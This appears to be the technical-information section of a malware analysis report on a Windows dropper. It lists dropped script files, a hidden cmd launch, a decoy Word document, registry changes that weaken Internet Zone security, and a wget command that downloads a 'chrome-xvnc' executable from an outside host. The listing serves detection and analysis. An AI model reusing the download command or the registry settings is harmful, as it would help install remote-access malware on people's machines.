Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
- %TEMP%\getchrome.cmd
- %TEMP%\getchrome.vbs
- %TEMP%\wget.exe
- %TEMP%\vizit.docx
- nul
- 'br###ridge.com':80
- 'br###ridge.com':443
- http://br###ridge.com/images/thumb/chrome-xvnc-v5517.exe
- 'br###ridge.com':443
- DNS ASK br###ridge.com
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\getchrome.vbs"
- '%TEMP%\wget.exe' -N http://brokbridge.com/images/thumb/chrome-xvnc-v5517.exe
- '%WINDIR%\syswow64\cmd.exe' /c getchrome.cmd' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%TEMP%\vizit.docx"
- '%WINDIR%\syswow64\cmd.exe' /c getchrome.cmd
- '%WINDIR%\syswow64\chcp.com' 1251